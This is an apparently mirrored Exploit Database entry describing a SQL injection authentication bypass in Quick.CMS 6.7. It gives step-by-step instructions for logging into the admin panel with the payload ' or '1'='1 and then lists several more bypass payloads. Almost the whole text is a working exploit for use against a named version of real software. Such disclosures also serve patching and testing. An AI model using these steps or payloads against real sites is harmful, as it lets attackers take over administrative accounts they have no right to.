Quick.CMS 6.7 – SQL Injection Login Bypass

• Exploit Database
• 71 阅读

• 作者： H4X.Forensics
  日期： 2024-03-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51910/

• # Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
  # Google Dork: N/A
  # Date: 02-03-2024
  # Exploit Author: ./H4X.Forensics - Diyar
  # Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>
  # Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
  # Version: 6.7
  # Tested on: Windows
  # CVE : N/A
  
  How to exploit :
  
  *--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
  *--> Enter any Email like : root@root.com<mailto:root@root.com>
  *--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
  *--> Tick the Checkbox
  *--> Press Login
  *--> Congratz!
  
   *--> SQL Injection Authentication Bypass Payload : ' or '1'='1
  
  *--> Payloads Can be use :
  
  ' or '1'='1
  ' or ''='
  ' or 1]%00
  ' or /* or '
  ' or "a" or '
  ' or 1 or '
  ' or true() or '